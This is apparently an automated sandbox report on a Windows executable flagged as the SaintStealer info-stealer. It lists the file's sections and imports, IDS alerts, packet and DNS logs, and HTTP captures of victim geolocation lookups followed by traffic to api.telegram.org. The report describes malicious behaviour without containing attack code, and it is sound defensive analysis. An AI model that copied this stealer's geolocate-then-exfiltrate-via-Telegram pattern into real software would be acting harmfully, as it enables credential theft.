                                .text0x10000x3a48e00x3a4a00418d52d22d0626c93475b7ef2f69473funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x3a60000x1681680x1682007d024da4e364f95e765edb693d0e0470False0.3832728165133634data5.570926269189883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x50f0000x70b00x6200254e2bcebbf320ff6f1ad171ec302c16False0.4083227040816326data4.251782437606779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata0x5170000x148e00x14a00e0382aea4f0e950de6c4ac2410d86fe3False0.48731060606060606data6.250942251591513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x52c0000x80a40x8200d18ff0828687cfa57d6e95da4cab3c38False0.26580528846153845data5.455481822699318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Imports

                                DLLImport
                                api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                bcryptprimitives.dllProcessPrng
                                ntdll.dllNtDeviceIoControlFile, NtCreateFile, NtWriteFile, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, NtReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                kernel32.dllMultiByteToWideChar, WriteConsoleW, GetModuleHandleA, GetProcAddress, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, SetFilePointerEx, QueryPerformanceCounter, CreateDirectoryW, FindFirstFileW, FindClose, GetConsoleMode, SetFileCompletionNotificationModes, CreateIoCompletionPort, GetQueuedCompletionStatusEx, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, HeapAlloc, GetStdHandle, GetCurrentDirectoryW, WaitForSingleObjectEx, AddVectoredExceptionHandler, CreateMutexA, ReleaseMutex, WideCharToMultiByte, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, UnhandledExceptionFilter, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, CreateFileW, SetUnhandledExceptionFilter, HeapReAlloc, GetExitCodeProcess, WaitForSingleObject, GetSystemTimePreciseAsFileTime, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, GetSystemTimeAsFileTime, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, TerminateProcess, IsProcessorFeaturePresent, GetLastError, InitializeSListHead, GetCurrentThread, CloseHandle, IsDebuggerPresent, GetFileInformationByHandle, HeapFree, GetProcessHeap, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryA, SetThreadStackGuarantee, FindNextFileW, LoadLibraryExW
                                ws2_32.dllWSAIoctl, ioctlsocket, socket, getsockname, WSAGetLastError, WSASend, shutdown, getpeername, send, WSACleanup, getsockopt, WSASocketW, closesocket, select, bind, listen, accept, setsockopt, freeaddrinfo, getaddrinfo, recv, connect, WSAStartup
                                rstrtmgr.dllRmRegisterResources, RmGetList, RmStartSession
                                user32.dllEnumDisplaySettingsExW, EnumDisplayMonitors, GetMonitorInfoW
                                bcrypt.dllBCryptGenRandom
                                advapi32.dllRegQueryValueExW, CheckTokenMembership, RegOpenKeyExW, AllocateAndInitializeSid, RegCloseKey, SystemFunction036, FreeSid
                                secur32.dllFreeCredentialsHandle, DeleteSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, EncryptMessage, DecryptMessage, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
                                crypt32.dllCertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateStore, CertOpenStore, CertDuplicateCertificateContext, CertDuplicateCertificateChain, CertCloseStore, CryptUnprotectData
                                oleaut32.dllSysAllocStringLen, SafeArrayDestroy, VariantClear, SafeArrayAccessData, SysFreeString, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayUnaccessData
                                ole32.dllCoSetProxyBlanket, CoInitializeSecurity, CoInitializeEx, CoCreateInstance
                                gdi32.dllGetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, DeleteDC, GetDIBits, GetObjectW, DeleteObject, CreateDCW, StretchBlt
                                api-ms-win-crt-math-l1-1-0.dlllog, ceil, exp2f, _dclass, pow, truncf, __setusermatherr, roundf
                                api-ms-win-crt-string-l1-1-0.dllstrcspn, strlen, strcmp, strcpy_s, wcsncmp, strncmp
                                api-ms-win-crt-heap-l1-1-0.dllfree, _msize, realloc, calloc, malloc, _set_new_mode
                                api-ms-win-crt-utility-l1-1-0.dll_rotl64, qsort
                                api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _seh_filter_exe, _endthreadex, _get_initial_narrow_environment, _initterm, _initialize_onexit_table, _beginthreadex, _initterm_e, exit, _exit, terminate, abort, __p___argc, __p___argv, _cexit, _c_exit, _register_onexit_function, _register_thread_local_exe_atexit_callback, _crt_atexit, _initialize_narrow_environment, _set_app_type
                                api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                2024-07-29T07:33:02.984024+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971440.127.169.103192.168.2.5
                                2024-07-29T07:32:24.993610+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970540.127.169.103192.168.2.5
                                2024-07-29T07:32:56.286114+0200TCP2039009ET MALWARE Win32/SaintStealer CnC Response44349713149.154.167.220192.168.2.5

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 29, 2024 07:32:07.112714052 CEST4970480192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:07.118252993 CEST8049704195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:07.118357897 CEST4970480192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:07.119781017 CEST4970480192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:07.124887943 CEST8049704195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:07.768171072 CEST8049704195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:07.768799067 CEST4970480192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:07.774341106 CEST8049704195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:07.774432898 CEST4970480192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:42.781970024 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:42.787050962 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:42.787149906 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:42.787456036 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:42.792381048 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.409780025 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.410648108 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.410727024 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:44.410871029 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.410917044 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:44.411043882 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:44.412189960 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.412257910 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:44.649003983 CEST8049712195.201.57.90192.168.2.5
                                Jul 29, 2024 07:32:44.649089098 CEST4971280192.168.2.5195.201.57.90
                                Jul 29, 2024 07:32:54.622900009 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:54.622955084 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:54.623033047 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:54.627111912 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:54.627131939 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.249659061 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.249739885 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.254338026 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.254371881 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.254722118 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.297576904 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.297692060 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.297962904 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298039913 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298154116 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298239946 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298259974 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298315048 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298358917 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298377991 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298465014 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298576117 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298621893 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298655987 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298718929 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298755884 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298923016 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298965931 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.298966885 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.298988104 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.299103022 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299129963 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.299173117 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299196959 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299230099 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299269915 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.299285889 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299375057 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299393892 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.299398899 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299436092 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299485922 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.299510002 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.313872099 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314014912 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314035892 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314306974 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314326048 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314357042 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314393044 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314397097 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314420938 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314444065 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314445972 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314477921 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314507961 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314531088 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314558029 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314564943 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314600945 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314621925 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.314626932 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314651966 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314702034 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314702034 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.314739943 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.319708109 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.319792986 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.319844007 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.319912910 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.319912910 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.330530882 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.330799103 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.330840111 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.330888987 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.330921888 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.330986977 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.331012011 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:55.331068039 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.331108093 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.331129074 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.331163883 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:55.342963934 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:56.285474062 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:56.285650015 CEST44349713149.154.167.220192.168.2.5
                                Jul 29, 2024 07:32:56.285887003 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:56.287503958 CEST49713443192.168.2.5149.154.167.220
                                Jul 29, 2024 07:32:56.287544966 CEST44349713149.154.167.220192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 29, 2024 07:32:07.100429058 CEST5907553192.168.2.51.1.1.1
                                Jul 29, 2024 07:32:07.108586073 CEST53590751.1.1.1192.168.2.5
                                Jul 29, 2024 07:32:42.773597956 CEST6345353192.168.2.51.1.1.1
                                Jul 29, 2024 07:32:42.780849934 CEST53634531.1.1.1192.168.2.5
                                Jul 29, 2024 07:32:54.611639977 CEST6277353192.168.2.51.1.1.1
                                Jul 29, 2024 07:32:54.618921995 CEST53627731.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 29, 2024 07:32:07.100429058 CEST192.168.2.51.1.1.10x412cStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                                Jul 29, 2024 07:32:42.773597956 CEST192.168.2.51.1.1.10x4997Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                Jul 29, 2024 07:32:54.611639977 CEST192.168.2.51.1.1.10x4534Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 29, 2024 07:32:07.108586073 CEST1.1.1.1192.168.2.50x412cNo error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                Jul 29, 2024 07:32:42.780849934 CEST1.1.1.1192.168.2.50x4997No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                Jul 29, 2024 07:32:54.618921995 CEST1.1.1.1192.168.2.50x4534No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • api.telegram.org
                                • ipwho.is

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704195.201.57.90801996C:\Users\user\Desktop\765iYbgWn9.exe
                                TimestampBytes transferredDirectionData
                                Jul 29, 2024 07:32:07.119781017 CEST59OUTGET /?output=json HTTP/1.1
                                accept: */*
                                host: ipwho.is
                                Jul 29, 2024 07:32:07.768171072 CEST950INHTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:07 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:07-04:00"}}0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549712195.201.57.90801996C:\Users\user\Desktop\765iYbgWn9.exe
                                TimestampBytes transferredDirectionData
                                Jul 29, 2024 07:32:42.787456036 CEST59OUTGET /?output=json HTTP/1.1
                                accept: */*
                                host: ipwho.is
                                Jul 29, 2024 07:32:44.409780025 CEST950INHTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                Jul 29, 2024 07:32:44.410648108 CEST950INHTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                                Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:32:43-04:00"}}0
                                Jul 29, 2024 07:32:44.410871029 CEST950INHTTP/1.1 200 OK
                                Date: Mon, 29 Jul 2024 05:32:43 GMT
                                Content-Type: application/json; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Server: ipwhois
                                Access-Control-Allow-Headers: *
                                X-Robots-Tag: noindex
                                Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
